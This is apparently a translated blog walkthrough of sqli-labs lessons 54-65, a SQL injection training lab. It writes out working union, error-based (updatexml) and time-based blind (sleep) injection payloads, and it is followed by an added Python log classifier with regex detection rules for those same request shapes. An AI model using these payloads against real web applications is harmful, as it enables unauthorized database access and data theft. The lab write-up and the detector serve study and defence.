sqli-labs walkthrough: lessons 54-65

LESS54

Level requirements: the goal of this challenge is to dump the key from a random table in the database in fewer than 10 attempts. For fun, on each reset the challenge generates random table names, column names and table data, so the data stays fresh at all times.

① Determine the number of columns (binary search)

Input: ?id=1' order by 3 --+

② Get the current database

Input: ?id=-1' union select 1,2,database() --+

③ Look up the table name

Input: ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+

9po9d7v0i2

④ Look up the column names

Input: ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='9po9d7v0i2' --+

⑤ Read the field values

Input: ?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_AMI8,tryy)) from challenges.9po9d7v0i2 --+

1fecbfa88f364df34c32702b62f11a7d9Sic5glsmSMXhqiRnTYvYP5qv4

Click submit to pass the level.

You stupid hacker put off!

 

LESS55

Parameter: (1)

Attempts: 14 times


LESS56

Parameter: ('1')

Attempts: 14 times

LESS57

Parameter: "1"

Attempts: 14 times

LESS58

Attempts: 5 times

union select cannot be used in this level because there is no position on the page where the result is echoed back.

We use error-based injection instead.

① Look up the table name

The database is already known to be challenges.

Input: ?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --+

② Look up the column names

Input: ?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jxpizjpo9r')),1) --+

③ Read the field value

Input: ?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_XMHT) from challenges.jxpizjpo9r)),1) --+

Congratulations on your success!


LESS59

Parameter: id=1 (no wrapping)

LESS60

Parameter: id=("1")

LESS61

Parameter: id=(('1'))

LESS62

A total of 130 attempts, so this is obviously meant for blind injection!

Input: ?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 'a' ,1, sleep(5)) --+

By changing the comparison value in sequence, the value can be determined.

LESS63

Parameter: '1'

LESS64

Parameter: ((1))

LESS65

Parameter: ("1")
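
From the defending side, the request shapes used in lessons 54 to 65 (order by probing, union select against information_schema, updatexml error injection and sleep-based blind probing) are recognisable in web server access logs. The Python below is an added example, not part of the original post: it classifies constructed log lines, and the Common Log Format layout, the /Less-NN/ paths and the rule names are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, unquote_plus

# Rule names are this example's own labels; each pattern mirrors a request shape from the lessons.
RULES = [
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("error-based-updatexml", re.compile(r"\bupdatexml\s*\(", re.I)),
    ("time-based-blind", re.compile(r"\bsleep\s*\(", re.I)),
]
# Assumed log layout: Common Log Format with the client address first.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return (client, [matching rule names]), or None if the line does not parse."""
    m = REQUEST.match(log_line)
    if not m:
        return None
    client, target = m.groups()
    # Decode %XX and '+' first, otherwise "union%20select" never matches.
    query = unquote_plus(urlsplit(target).query)
    return client, [name for name, rx in RULES if rx.search(query)]

def summarize(log_lines):
    """Count rule hits per client; clients with no hits are omitted."""
    hits = defaultdict(Counter)
    for line in log_lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            hits[parsed[0]].update(parsed[1])
    return dict(hits)

SAMPLE_LOG = [  # constructed lines using documentation IP ranges; the last two are benign
    '203.0.113.7 - - [12/Mar/2020:10:01:02 +0000] "GET /Less-54/?id=1%27%20order%20by%203%20--+ HTTP/1.1" 200 812',
    '203.0.113.7 - - [12/Mar/2020:10:01:09 +0000] "GET /Less-54/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20--+ HTTP/1.1" 200 840',
    '203.0.113.7 - - [12/Mar/2020:10:02:30 +0000] "GET /Less-58/?id=1%27%20and%20updatexml(1,concat(0x7e,database()),1)%20--+ HTTP/1.1" 200 790',
    '203.0.113.7 - - [12/Mar/2020:10:03:11 +0000] "GET /Less-62/?id=1%27)%20and%20if(1=1,1,sleep(5))%20--+ HTTP/1.1" 200 801',
    '198.51.100.4 - - [12/Mar/2020:10:03:40 +0000] "GET /Less-54/?id=2 HTTP/1.1" 200 805',
    '198.51.100.4 - - [12/Mar/2020:10:03:55 +0000] "GET /search?q=how+to+order+by+date HTTP/1.1" 200 1204',
]

if __name__ == "__main__":
    for client, counts in summarize(SAMPLE_LOG).items():
        print(client, dict(counts))
```

Lesson 62 allows 130 attempts because blind extraction needs many requests, so a high per-client count for the time-based rule is a useful signal on its own.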

Origin www.cnblogs.com/c1047509362/p/12512621.html